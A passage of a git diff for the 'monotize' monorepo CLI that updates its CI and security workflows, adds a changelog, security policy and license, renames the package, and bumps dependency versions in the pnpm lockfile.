diff --git a/.github/code-scanning.yml b/.github/code-scanning.yml deleted file mode 100644 index 79a28a1..0000000 --- a/.github/code-scanning.yml +++ /dev/null @@ -1,24 +0,0 @@ -# Configuration for GitHub's default code scanning -# This controls the automatic CodeQL analysis run by GitHub Advanced Security - -name: "Default Code Scanning Config" - -# Use only security queries, not code quality -queries: - - uses: security-extended - -# Exclude queries that cause false positives -query-filters: - - exclude: - id: js/unused-local-variable - - exclude: - id: js/insecure-temporary-file - -# Exclude test files from analysis -paths-ignore: - - tests/** - - "**/*.test.ts" - - "**/*.spec.ts" - - node_modules/** - - "**/__tests__/**" - - "**/__mocks__/**" diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index fd80e85..f3165fb 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -49,13 +49,43 @@ jobs: done echo "No sensitive files found" - test: - name: Test (Node ${{ matrix.node-version }}) + dependency-freshness: + name: Dependency Freshness runs-on: ubuntu-latest needs: safety-check + + steps: + - name: Checkout + uses: actions/checkout@v4 + + - name: Install pnpm + uses: pnpm/action-setup@v4 + with: + version: 9 + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: 'pnpm' + + - name: Install dependencies + run: pnpm install --frozen-lockfile + + - name: Report outdated dependencies + run: | + if ! pnpm outdated; then + echo "::notice::Outdated dependencies detected. See log above." + fi + + test: + name: Test (Node ${{ matrix.node-version }}, ${{ matrix.os }}) + runs-on: ${{ matrix.os }} + needs: [safety-check, dependency-freshness] strategy: matrix: node-version: [18, 20, 22] + os: [ubuntu-latest, macos-latest, windows-latest] fail-fast: false steps: @@ -79,6 +109,11 @@ jobs: - name: Build run: pnpm build + - name: CLI smoke test + run: | + node dist/index.js --version + node dist/index.js merge --help + - name: Type check run: pnpm typecheck @@ -336,3 +371,43 @@ jobs: fi echo "History preserved successfully with $COMMIT_COUNT commits" timeout-minutes: 5 + + smoke-test: + name: Publish Smoke Test + runs-on: ubuntu-latest + needs: test + + steps: + - name: Checkout + uses: actions/checkout@v4 + + - name: Install pnpm + uses: pnpm/action-setup@v4 + with: + version: 9 + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: 'pnpm' + + - name: Install dependencies + run: pnpm install --frozen-lockfile + + - name: Build + run: pnpm build + + - name: Verify built CLI works + run: | + node dist/index.js --version + node dist/index.js merge --help + + - name: Type-check tests + run: pnpm tsc -p tests/tsconfig.json --noEmit + + - name: Publish dry run + run: | + npm pack --dry-run 2>&1 | tee pack-output.txt + echo "--- Package contents ---" + cat pack-output.txt diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml index 092ba40..bd39bb1 100644 --- a/.github/workflows/security.yml +++ b/.github/workflows/security.yml @@ -34,7 +34,6 @@ jobs: - name: Run pnpm audit run: pnpm audit --audit-level=high - continue-on-error: true codeql: name: CodeQL Analysis @@ -113,4 +112,4 @@ jobs: with: scan-args: |- --lockfile=pnpm-lock.yaml - fail-on-vuln: false + fail-on-vuln: true diff --git a/.gitignore b/.gitignore old mode 100644 new mode 100755 index 020a4d5..e6e3a4d --- a/.gitignore +++ b/.gitignore @@ -2,8 +2,19 @@ node_modules/ dist/ *.log .DS_Store +._* coverage/ .env .env.local tests/.temp/ tests/.test-output/ + +# Local runtime/workspace artifacts from monotize runs +.monotize/ +monorepo/ +/packages/ +monorepo.staging-*/ +monorepo.staging-*.ops.jsonl + +# Local assistant/editor state +.claude/ diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100755 index 0000000..21b9005 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,5 @@ +{ + "files.exclude": { + "**/._*": true + } +} diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100755 index 0000000..a5b274a --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,33 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] + +### Added +- Full lifecycle CLI commands: `add`, `archive`, `configure`, `migrate-branch` +- Extended analysis engine with environment, tooling, CI, publishing, and repo risk detection +- Risk classification system (straightforward / needs-decisions / complex) +- Path-filtered GitHub Actions workflow generation +- Configure engine for Prettier, ESLint, and TypeScript scaffolding +- Dependency enforcement via package manager overrides/resolutions +- Multi-language detection (Go, Rust, Python) with workspace scaffolding +- Smart defaults with evidence-based suggestions +- Performance utilities (concurrent mapping, disk space checks, progress events) +- Cross-platform path normalization +- 8-step wizard UI with SeverityBadge, DiffViewer, TreePreview, FindingsFilter components + +### Security +- Fixed Python injection vulnerability in history preservation (SEC-01) +- Fixed path traversal vulnerability in apply command (SEC-02) +- Added install command executable allowlist (SEC-04) +- Replaced shell `exec()` with `execFile()` in browser opener (SEC-05) +- Added server authentication via shared-secret token (SEC-03) +- Added CORS, rate limiting, and body size limits to server +- Added symlink protection to file operations + +### Fixed +- Async `.filter()` bug in gitignore merge that caused all paths to be included diff --git a/LICENSE b/LICENSE new file mode 100755 index 0000000..08f24ef --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2026 pmclSF + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/SECURITY.md b/SECURITY.md new file mode 100755 index 0000000..b1996d7 --- /dev/null +++ b/SECURITY.md @@ -0,0 +1,25 @@ +# Security Policy + +## Supported Versions + +| Version | Supported | +| ------- | ------------------ | +| 0.x.x | :white_check_mark: | + +## Reporting a Vulnerability + +If you discover a security vulnerability in Monotize, please report it responsibly: + +1. **Do not** open a public GitHub issue for security vulnerabilities +2. Email the maintainer or use [GitHub Security Advisories](https://github.com/pmclSF/monotize/security/advisories/new) +3. Include a description of the vulnerability, steps to reproduce, and potential impact +4. Allow up to 72 hours for an initial response + +## Security Considerations + +Monotize executes git commands and package manager operations on your behalf. When using it: + +- Only merge repositories you trust +- Review plan files before applying them with `monotize apply` +- The web UI server (`monotize ui`) binds to localhost with token authentication — do not expose it to untrusted networks +- Never embed credentials directly in repository URLs — use SSH keys or credential helpers instead diff --git a/package.json b/package.json index 741adea..37a30d9 100755 --- a/package.json +++ b/package.json @@ -1,10 +1,25 @@ { - "name": "monorepo-cli", + "name": "monotize", "version": "0.2.0", "description": "Combine multiple Git repositories into a monorepo with pnpm, yarn, or npm workspace support", "type": "module", + "author": "pmclSF", + "repository": { + "type": "git", + "url": "https://github.com/pmclSF/monotize.git" + }, + "homepage": "https://github.com/pmclSF/monotize#readme", + "bugs": { + "url": "https://github.com/pmclSF/monotize/issues" + }, + "files": [ + "dist", + "bin", + "README.md", + "LICENSE" + ], "bin": { - "monorepo": "./bin/monorepo.js", + "monotize": "./bin/monorepo.js", "mr": "./bin/monorepo.js" }, "exports": "./dist/index.js", @@ -33,13 +48,17 @@ "commander": "^12.0.0", "express": "^5.2.1", "fs-extra": "^11.2.0", + "js-yaml": "^4.1.1", + "semver": "^7.7.3", "simple-git": "^3.22.0", "ws": "^8.19.0" }, "devDependencies": { "@types/express": "^5.0.6", "@types/fs-extra": "^11.0.0", + "@types/js-yaml": "^4.0.9", "@types/node": "^20.0.0", + "@types/semver": "^7.5.0", "@types/supertest": "^7.2.0", "@types/ws": "^8.18.1", "@vitest/coverage-v8": "^2.0.0", @@ -59,5 +78,12 @@ "turborepo", "nx" ], + "pnpm": { + "overrides": { + "esbuild": ">=0.25.0", + "minimatch": ">=9.0.7", + "rollup": ">=4.59.0" + } + }, "license": "MIT" } diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml index 351d74c..c21a842 100755 --- a/pnpm-lock.yaml +++ b/pnpm-lock.yaml @@ -4,6 +4,11 @@ settings: autoInstallPeers: true excludeLinksFromLockfile: false +overrides: + esbuild: '>=0.25.0' + minimatch: '>=9.0.7' + rollup: '>=4.59.0' + importers: .: @@ -23,6 +28,12 @@ importers: fs-extra: specifier: ^11.2.0 version: 11.3.3 + js-yaml: + specifier: ^4.1.1 + version: 4.1.1 + semver: + specifier: ^7.7.3 + version: 7.7.3 simple-git: specifier: ^3.22.0 version: 3.30.0 @@ -36,9 +47,15 @@ importers: '@types/fs-extra': specifier: ^11.0.0 version: 11.0.4 + '@types/js-yaml': + specifier: ^4.0.9 + version: 4.0.9 '@types/node': specifier: ^20.0.0 version: 20.19.31 + '@types/semver': + specifier: ^7.5.0 + version: 7.7.1 '@types/supertest': specifier: ^7.2.0 version: 7.2.0 @@ -87,204 +104,102 @@ packages: '@bcoe/v8-coverage@0.2.3': resolution: {integrity: sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==} - '@esbuild/aix-ppc64@0.21.5': - resolution: {integrity: sha512-1SDgH6ZSPTlggy1yI6+Dbkiz8xzpHJEVAlF/AM1tHPLsf5STom9rwtjE4hKAF20FfXXNTFqEYXyJNWh1GiZedQ==} - engines: {node: '>=12'} - cpu: [ppc64] - os: [aix] - '@esbuild/aix-ppc64@0.27.2': resolution: {integrity: sha512-GZMB+a0mOMZs4MpDbj8RJp4cw+w1WV5NYD6xzgvzUJ5Ek2jerwfO2eADyI6ExDSUED+1X8aMbegahsJi+8mgpw==} engines: {node: '>=18'} cpu: [ppc64] os: [aix] - '@esbuild/android-arm64@0.21.5': - resolution: {integrity: sha512-c0uX9VAUBQ7dTDCjq+wdyGLowMdtR/GoC2U5IYk/7D1H1JYC0qseD7+11iMP2mRLN9RcCMRcjC4YMclCzGwS/A==} - engines: {node: '>=12'} - cpu: [arm64] - os: [android] - '@esbuild/android-arm64@0.27.2': resolution: {integrity: sha512-pvz8ZZ7ot/RBphf8fv60ljmaoydPU12VuXHImtAs0XhLLw+EXBi2BLe3OYSBslR4rryHvweW5gmkKFwTiFy6KA==} engines: {node: '>=18'} cpu: [arm64] os: [android] - '@esbuild/android-arm@0.21.5': - resolution: {integrity: sha512-vCPvzSjpPHEi1siZdlvAlsPxXl7WbOVUBBAowWug4rJHb68Ox8KualB+1ocNvT5fjv6wpkX6o/iEpbDrf68zcg==} - engines: {node: '>=12'} - cpu: [arm] - os: [android] - '@esbuild/android-arm@0.27.2': resolution: {integrity: sha512-DVNI8jlPa7Ujbr1yjU2PfUSRtAUZPG9I1RwW4F4xFB1Imiu2on0ADiI/c3td+KmDtVKNbi+nffGDQMfcIMkwIA==} engines: {node: '>=18'} cpu: [arm] os: [android] - '@esbuild/android-x64@0.21.5': - resolution: {integrity: sha512-D7aPRUUNHRBwHxzxRvp856rjUHRFW1SdQATKXH2hqA0kAZb1hKmi02OpYRacl0TxIGz/ZmXWlbZgjwWYaCakTA==} - engines: {node: '>=12'} - cpu: [x64] - os: [android] - '@esbuild/android-x64@0.27.2': resolution: {integrity: sha512-z8Ank4Byh4TJJOh4wpz8g2vDy75zFL0TlZlkUkEwYXuPSgX8yzep596n6mT7905kA9uHZsf/o2OJZubl2l3M7A==} engines: {node: '>=18'} cpu: [x64] os: [android] - '@esbuild/darwin-arm64@0.21.5': - resolution: {integrity: sha512-DwqXqZyuk5AiWWf3UfLiRDJ5EDd49zg6O9wclZ7kUMv2WRFr4HKjXp/5t8JZ11QbQfUS6/cRCKGwYhtNAY88kQ==} - engines: {node: '>=12'} - cpu: [arm64] - os: [darwin] - '@esbuild/darwin-arm64@0.27.2': resolution: {integrity: sha512-davCD2Zc80nzDVRwXTcQP/28fiJbcOwvdolL0sOiOsbwBa72kegmVU0Wrh1MYrbuCL98Omp5dVhQFWRKR2ZAlg==} engines: {node: '>=18'} cpu: [arm64] os: [darwin] - '@esbuild/darwin-x64@0.21.5': - resolution: {integrity: sha512-se/JjF8NlmKVG4kNIuyWMV/22ZaerB+qaSi5MdrXtd6R08kvs2qCN4C09miupktDitvh8jRFflwGFBQcxZRjbw==} - engines: {node: '>=12'} - cpu: [x64] - os: [darwin] - '@esbuild/darwin-x64@0.27.2': resolution: {integrity: sha512-ZxtijOmlQCBWGwbVmwOF/UCzuGIbUkqB1faQRf5akQmxRJ1ujusWsb3CVfk/9iZKr2L5SMU5wPBi1UWbvL+VQA==} engines: {node: '>=18'} cpu: [x64] os: [darwin] - '@esbuild/freebsd-arm64@0.21.5': - resolution: {integrity: sha512-5JcRxxRDUJLX8JXp/wcBCy3pENnCgBR9bN6JsY4OmhfUtIHe3ZW0mawA7+RDAcMLrMIZaf03NlQiX9DGyB8h4g==} - engines: {node: '>=12'} - cpu: [arm64] - os: [freebsd] - '@esbuild/freebsd-arm64@0.27.2': resolution: {integrity: sha512-lS/9CN+rgqQ9czogxlMcBMGd+l8Q3Nj1MFQwBZJyoEKI50XGxwuzznYdwcav6lpOGv5BqaZXqvBSiB/kJ5op+g==} engines: {node: '>=18'} cpu: [arm64] os: [freebsd] - '@esbuild/freebsd-x64@0.21.5': - resolution: {integrity: sha512-J95kNBj1zkbMXtHVH29bBriQygMXqoVQOQYA+ISs0/2l3T9/kj42ow2mpqerRBxDJnmkUDCaQT/dfNXWX/ZZCQ==} - engines: {node: '>=12'} - cpu: [x64] - os: [freebsd] - '@esbuild/freebsd-x64@0.27.2': resolution: {integrity: sha512-tAfqtNYb4YgPnJlEFu4c212HYjQWSO/w/h/lQaBK7RbwGIkBOuNKQI9tqWzx7Wtp7bTPaGC6MJvWI608P3wXYA==} engines: {node: '>=18'} cpu: [x64] os: [freebsd] - '@esbuild/linux-arm64@0.21.5': - resolution: {integrity: sha512-ibKvmyYzKsBeX8d8I7MH/TMfWDXBF3db4qM6sy+7re0YXya+K1cem3on9XgdT2EQGMu4hQyZhan7TeQ8XkGp4Q==} - engines: {node: '>=12'} - cpu: [arm64] - os: [linux] - '@esbuild/linux-arm64@0.27.2': resolution: {integrity: sha512-hYxN8pr66NsCCiRFkHUAsxylNOcAQaxSSkHMMjcpx0si13t1LHFphxJZUiGwojB1a/Hd5OiPIqDdXONia6bhTw==} engines: {node: '>=18'} cpu: [arm64] os: [linux] - '@esbuild/linux-arm@0.21.5': - resolution: {integrity: sha512-bPb5AHZtbeNGjCKVZ9UGqGwo8EUu4cLq68E95A53KlxAPRmUyYv2D6F0uUI65XisGOL1hBP5mTronbgo+0bFcA==} - engines: {node: '>=12'} - cpu: [arm] - os: [linux] - '@esbuild/linux-arm@0.27.2': resolution: {integrity: sha512-vWfq4GaIMP9AIe4yj1ZUW18RDhx6EPQKjwe7n8BbIecFtCQG4CfHGaHuh7fdfq+y3LIA2vGS/o9ZBGVxIDi9hw==} engines: {node: '>=18'} cpu: [arm] os: [linux] - '@esbuild/linux-ia32@0.21.5': - resolution: {integrity: sha512-YvjXDqLRqPDl2dvRODYmmhz4rPeVKYvppfGYKSNGdyZkA01046pLWyRKKI3ax8fbJoK5QbxblURkwK/MWY18Tg==} - engines: {node: '>=12'} - cpu: [ia32] - os: [linux] - '@esbuild/linux-ia32@0.27.2': resolution: {integrity: sha512-MJt5BRRSScPDwG2hLelYhAAKh9imjHK5+NE/tvnRLbIqUWa+0E9N4WNMjmp/kXXPHZGqPLxggwVhz7QP8CTR8w==} engines: {node: '>=18'} cpu: [ia32] os: [linux] - '@esbuild/linux-loong64@0.21.5': - resolution: {integrity: sha512-uHf1BmMG8qEvzdrzAqg2SIG/02+4/DHB6a9Kbya0XDvwDEKCoC8ZRWI5JJvNdUjtciBGFQ5PuBlpEOXQj+JQSg==} - engines: {node: '>=12'} - cpu: [loong64] - os: [linux] - '@esbuild/linux-loong64@0.27.2': resolution: {integrity: sha512-lugyF1atnAT463aO6KPshVCJK5NgRnU4yb3FUumyVz+cGvZbontBgzeGFO1nF+dPueHD367a2ZXe1NtUkAjOtg==} engines: {node: '>=18'} cpu: [loong64] os: [linux] - '@esbuild/linux-mips64el@0.21.5': - resolution: {integrity: sha512-IajOmO+KJK23bj52dFSNCMsz1QP1DqM6cwLUv3W1QwyxkyIWecfafnI555fvSGqEKwjMXVLokcV5ygHW5b3Jbg==} - engines: {node: '>=12'} - cpu: [mips64el] - os: [linux] - '@esbuild/linux-mips64el@0.27.2': resolution: {integrity: sha512-nlP2I6ArEBewvJ2gjrrkESEZkB5mIoaTswuqNFRv/WYd+ATtUpe9Y09RnJvgvdag7he0OWgEZWhviS1OTOKixw==} engines: {node: '>=18'} cpu: [mips64el] os: [linux] - '@esbuild/linux-ppc64@0.21.5': - resolution: {integrity: sha512-1hHV/Z4OEfMwpLO8rp7CvlhBDnjsC3CttJXIhBi+5Aj5r+MBvy4egg7wCbe//hSsT+RvDAG7s81tAvpL2XAE4w==} - engines: {node: '>=12'} - cpu: [ppc64] - os: [linux] - '@esbuild/linux-ppc64@0.27.2': resolution: {integrity: sha512-C92gnpey7tUQONqg1n6dKVbx3vphKtTHJaNG2Ok9lGwbZil6DrfyecMsp9CrmXGQJmZ7iiVXvvZH6Ml5hL6XdQ==} engines: {node: '>=18'} cpu: [ppc64] os: [linux] - '@esbuild/linux-riscv64@0.21.5': - resolution: {integrity: sha512-2HdXDMd9GMgTGrPWnJzP2ALSokE/0O5HhTUvWIbD3YdjME8JwvSCnNGBnTThKGEB91OZhzrJ4qIIxk/SBmyDDA==} - engines: {node: '>=12'} - cpu: [riscv64] - os: [linux] - '@esbuild/linux-riscv64@0.27.2': resolution: {integrity: sha512-B5BOmojNtUyN8AXlK0QJyvjEZkWwy/FKvakkTDCziX95AowLZKR6aCDhG7LeF7uMCXEJqwa8Bejz5LTPYm8AvA==} engines: {node: '>=18'} cpu: [riscv64] os: [linux] - '@esbuild/linux-s390x@0.21.5': - resolution: {integrity: sha512-zus5sxzqBJD3eXxwvjN1yQkRepANgxE9lgOW2qLnmr8ikMTphkjgXu1HR01K4FJg8h1kEEDAqDcZQtbrRnB41A==} - engines: {node: '>=12'} - cpu: [s390x] - os: [linux] - '@esbuild/linux-s390x@0.27.2': resolution: {integrity: sha512-p4bm9+wsPwup5Z8f4EpfN63qNagQ47Ua2znaqGH6bqLlmJ4bx97Y9JdqxgGZ6Y8xVTixUnEkoKSHcpRlDnNr5w==} engines: {node: '>=18'} cpu: [s390x] os: [linux] - '@esbuild/linux-x64@0.21.5': - resolution: {integrity: sha512-1rYdTpyv03iycF1+BhzrzQJCdOuAOtaqHTWJZCWvijKD2N5Xu0TtVC8/+1faWqcP9iBCWOmjmhoH94dH82BxPQ==} - engines: {node: '>=12'} - cpu: [x64] - os: [linux] - '@esbuild/linux-x64@0.27.2': resolution: {integrity: sha512-uwp2Tip5aPmH+NRUwTcfLb+W32WXjpFejTIOWZFw/v7/KnpCDKG66u4DLcurQpiYTiYwQ9B7KOeMJvLCu/OvbA==} engines: {node: '>=18'} @@ -297,12 +212,6 @@ packages: cpu: [arm64] os: [netbsd] - '@esbuild/netbsd-x64@0.21.5': - resolution: {integrity: sha512-Woi2MXzXjMULccIwMnLciyZH4nCIMpWQAs049KEeMvOcNADVxo0UBIQPfSmxB3CWKedngg7sWZdLvLczpe0tLg==} - engines: {node: '>=12'} - cpu: [x64] - os: [netbsd] - '@esbuild/netbsd-x64@0.27.2': resolution: {integrity: sha512-HwGDZ0VLVBY3Y+Nw0JexZy9o/nUAWq9MlV7cahpaXKW6TOzfVno3y3/M8Ga8u8Yr7GldLOov27xiCnqRZf0tCA==} engines: {node: '>=18'} @@ -315,12 +224,6 @@ packages: cpu: [arm64] os: [openbsd] - '@esbuild/openbsd-x64@0.21.5': - resolution: {integrity: sha512-HLNNw99xsvx12lFBUwoT8EVCsSvRNDVxNpjZ7bPn947b8gJPzeHWyNVhFsaerc0n3TsbOINvRP2byTZ5LKezow==} - engines: {node: '>=12'} - cpu: [x64] - os: [openbsd] - '@esbuild/openbsd-x64@0.27.2': resolution: {integrity: sha512-/it7w9Nb7+0KFIzjalNJVR5bOzA9Vay+yIPLVHfIQYG/j+j9VTH84aNB8ExGKPU4AzfaEvN9/V4HV+F+vo8OEg==} engines: {node: '>=18'} @@ -333,48 +236,24 @@ packages: cpu: [arm64] os: [openharmony] - '@esbuild/sunos-x64@0.21.5': - resolution: {integrity: sha512-6+gjmFpfy0BHU5Tpptkuh8+uw3mnrvgs+dSPQXQOv3ekbordwnzTVEb4qnIvQcYXq6gzkyTnoZ9dZG+D4garKg==} - engines: {node: '>=12'} - cpu: [x64] - os: [sunos] - '@esbuild/sunos-x64@0.27.2': resolution: {integrity: sha512-kMtx1yqJHTmqaqHPAzKCAkDaKsffmXkPHThSfRwZGyuqyIeBvf08KSsYXl+abf5HDAPMJIPnbBfXvP2ZC2TfHg==} engines: {node: '>=18'} cpu: [x64] os: [sunos] - '@esbuild/win32-arm64@0.21.5': - resolution: {integrity: sha512-Z0gOTd75VvXqyq7nsl93zwahcTROgqvuAcYDUr+vOv8uHhNSKROyU961kgtCD1e95IqPKSQKH7tBTslnS3tA8A==} - engines: {node: '>=12'} - cpu: [arm64] - os: [win32] - '@esbuild/win32-arm64@0.27.2': resolution: {integrity: sha512-Yaf78O/B3Kkh+nKABUF++bvJv5Ijoy9AN1ww904rOXZFLWVc5OLOfL56W+C8F9xn5JQZa3UX6m+IktJnIb1Jjg==} engines: {node: '>=18'} cpu: [arm64] os: [win32] - '@esbuild/win32-ia32@0.21.5': - resolution: {integrity: sha512-SWXFF1CL2RVNMaVs+BBClwtfZSvDgtL//G/smwAc5oVK/UPu2Gu9tIaRgFmYFFKrmg3SyAjSrElf0TiJ1v8fYA==} - engines: {node: '>=12'} - cpu: [ia32] - os: [win32] - '@esbuild/win32-ia32@0.27.2': resolution: {integrity: sha512-Iuws0kxo4yusk7sw70Xa2E2imZU5HoixzxfGCdxwBdhiDgt9vX9VUCBhqcwY7/uh//78A1hMkkROMJq9l27oLQ==} engines: {node: '>=18'} cpu: [ia32] os: [win32] - '@esbuild/win32-x64@0.21.5': - resolution: {integrity: sha512-tQd/1efJuzPC6rCFwEvLtci/xNFcTZknmXs98FYDfGE4wP9ClFV98nyKrzJKVPMhdDnjzLhdUyMX4PsQAPjwIw==} - engines: {node: '>=12'} - cpu: [x64] - os: [win32] - '@esbuild/win32-x64@0.27.2': resolution: {integrity: sha512-sRdU18mcKf7F+YgheI/zGf5alZatMUTKj/jNS6l744f9u3WFu4v7twcUI9vu4mknF4Y9aDlblIie0IM+5xxaqQ==} engines: {node: '>=18'} @@ -553,141 +432,141 @@ packages: resolution: {integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==} engines: {node: '>=14'} - '@rollup/rollup-android-arm-eabi@4.57.1': - resolution: {integrity: sha512-A6ehUVSiSaaliTxai040ZpZ2zTevHYbvu/lDoeAteHI8QnaosIzm4qwtezfRg1jOYaUmnzLX1AOD6Z+UJjtifg==} + '@rollup/rollup-android-arm-eabi@4.59.0': + resolution: {integrity: sha512-upnNBkA6ZH2VKGcBj9Fyl9IGNPULcjXRlg0LLeaioQWueH30p6IXtJEbKAgvyv+mJaMxSm1l6xwDXYjpEMiLMg==} cpu: [arm] os: [android] - '@rollup/rollup-android-arm64@4.57.1': - resolution: {integrity: sha512-dQaAddCY9YgkFHZcFNS/606Exo8vcLHwArFZ7vxXq4rigo2bb494/xKMMwRRQW6ug7Js6yXmBZhSBRuBvCCQ3w==} + '@rollup/rollup-android-arm64@4.59.0': + resolution: {integrity: sha512-hZ+Zxj3SySm4A/DylsDKZAeVg0mvi++0PYVceVyX7hemkw7OreKdCvW2oQ3T1FMZvCaQXqOTHb8qmBShoqk69Q==} cpu: [arm64] os: [android] - '@rollup/rollup-darwin-arm64@4.57.1': - resolution: {integrity: sha512-crNPrwJOrRxagUYeMn/DZwqN88SDmwaJ8Cvi/TN1HnWBU7GwknckyosC2gd0IqYRsHDEnXf328o9/HC6OkPgOg==} + '@rollup/rollup-darwin-arm64@4.59.0': + resolution: {integrity: sha512-W2Psnbh1J8ZJw0xKAd8zdNgF9HRLkdWwwdWqubSVk0pUuQkoHnv7rx4GiF9rT4t5DIZGAsConRE3AxCdJ4m8rg==} cpu: [arm64] os: [darwin] - '@rollup/rollup-darwin-x64@4.57.1': - resolution: {integrity: sha512-Ji8g8ChVbKrhFtig5QBV7iMaJrGtpHelkB3lsaKzadFBe58gmjfGXAOfI5FV0lYMH8wiqsxKQ1C9B0YTRXVy4w==} + '@rollup/rollup-darwin-x64@4.59.0': + resolution: {integrity: sha512-ZW2KkwlS4lwTv7ZVsYDiARfFCnSGhzYPdiOU4IM2fDbL+QGlyAbjgSFuqNRbSthybLbIJ915UtZBtmuLrQAT/w==} cpu: [x64] os: [darwin] - '@rollup/rollup-freebsd-arm64@4.57.1': - resolution: {integrity: sha512-R+/WwhsjmwodAcz65guCGFRkMb4gKWTcIeLy60JJQbXrJ97BOXHxnkPFrP+YwFlaS0m+uWJTstrUA9o+UchFug==} + '@rollup/rollup-freebsd-arm64@4.59.0': + resolution: {integrity: sha512-EsKaJ5ytAu9jI3lonzn3BgG8iRBjV4LxZexygcQbpiU0wU0ATxhNVEpXKfUa0pS05gTcSDMKpn3Sx+QB9RlTTA==} cpu: [arm64] os: [freebsd] - '@rollup/rollup-freebsd-x64@4.57.1': - resolution: {integrity: sha512-IEQTCHeiTOnAUC3IDQdzRAGj3jOAYNr9kBguI7MQAAZK3caezRrg0GxAb6Hchg4lxdZEI5Oq3iov/w/hnFWY9Q==} + '@rollup/rollup-freebsd-x64@4.59.0': + resolution: {integrity: sha512-d3DuZi2KzTMjImrxoHIAODUZYoUUMsuUiY4SRRcJy6NJoZ6iIqWnJu9IScV9jXysyGMVuW+KNzZvBLOcpdl3Vg==} cpu: [x64] os: [freebsd] - '@rollup/rollup-linux-arm-gnueabihf@4.57.1': - resolution: {integrity: sha512-F8sWbhZ7tyuEfsmOxwc2giKDQzN3+kuBLPwwZGyVkLlKGdV1nvnNwYD0fKQ8+XS6hp9nY7B+ZeK01EBUE7aHaw==} + '@rollup/rollup-linux-arm-gnueabihf@4.59.0': + resolution: {integrity: sha512-t4ONHboXi/3E0rT6OZl1pKbl2Vgxf9vJfWgmUoCEVQVxhW6Cw/c8I6hbbu7DAvgp82RKiH7TpLwxnJeKv2pbsw==} cpu: [arm] os: [linux] libc: [glibc] - '@rollup/rollup-linux-arm-musleabihf@4.57.1': - resolution: {integrity: sha512-rGfNUfn0GIeXtBP1wL5MnzSj98+PZe/AXaGBCRmT0ts80lU5CATYGxXukeTX39XBKsxzFpEeK+Mrp9faXOlmrw==} + '@rollup/rollup-linux-arm-musleabihf@4.59.0': + resolution: {integrity: sha512-CikFT7aYPA2ufMD086cVORBYGHffBo4K8MQ4uPS/ZnY54GKj36i196u8U+aDVT2LX4eSMbyHtyOh7D7Zvk2VvA==} cpu: [arm] os: [linux] libc: [musl] - '@rollup/rollup-linux-arm64-gnu@4.57.1': - resolution: {integrity: sha512-MMtej3YHWeg/0klK2Qodf3yrNzz6CGjo2UntLvk2RSPlhzgLvYEB3frRvbEF2wRKh1Z2fDIg9KRPe1fawv7C+g==} + '@rollup/rollup-linux-arm64-gnu@4.59.0': + resolution: {integrity: sha512-jYgUGk5aLd1nUb1CtQ8E+t5JhLc9x5WdBKew9ZgAXg7DBk0ZHErLHdXM24rfX+bKrFe+Xp5YuJo54I5HFjGDAA==} cpu: [arm64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-arm64-musl@4.57.1': - resolution: {integrity: sha512-1a/qhaaOXhqXGpMFMET9VqwZakkljWHLmZOX48R0I/YLbhdxr1m4gtG1Hq7++VhVUmf+L3sTAf9op4JlhQ5u1Q==} + '@rollup/rollup-linux-arm64-musl@4.59.0': + resolution: {integrity: sha512-peZRVEdnFWZ5Bh2KeumKG9ty7aCXzzEsHShOZEFiCQlDEepP1dpUl/SrUNXNg13UmZl+gzVDPsiCwnV1uI0RUA==} cpu: [arm64] os: [linux] libc: [musl] - '@rollup/rollup-linux-loong64-gnu@4.57.1': - resolution: {integrity: sha512-QWO6RQTZ/cqYtJMtxhkRkidoNGXc7ERPbZN7dVW5SdURuLeVU7lwKMpo18XdcmpWYd0qsP1bwKPf7DNSUinhvA==} + '@rollup/rollup-linux-loong64-gnu@4.59.0': + resolution: {integrity: sha512-gbUSW/97f7+r4gHy3Jlup8zDG190AuodsWnNiXErp9mT90iCy9NKKU0Xwx5k8VlRAIV2uU9CsMnEFg/xXaOfXg==} cpu: [loong64] os: [linux] libc: [glibc] - '@rollup/rollup-linux-loong64-musl@4.57.1': - resolution: {integrity: sha512-xpObYIf+8gprgWaPP32xiN5RVTi/s5FCR+XMXSKmhfoJjrpRAjCuuqQXyxUa/eJTdAE6eJ+KDKaoEqjZQxh3Gw==} + '@rollup/rollup-linux-loong64-musl@4.59.0': + resolution: {integrity: 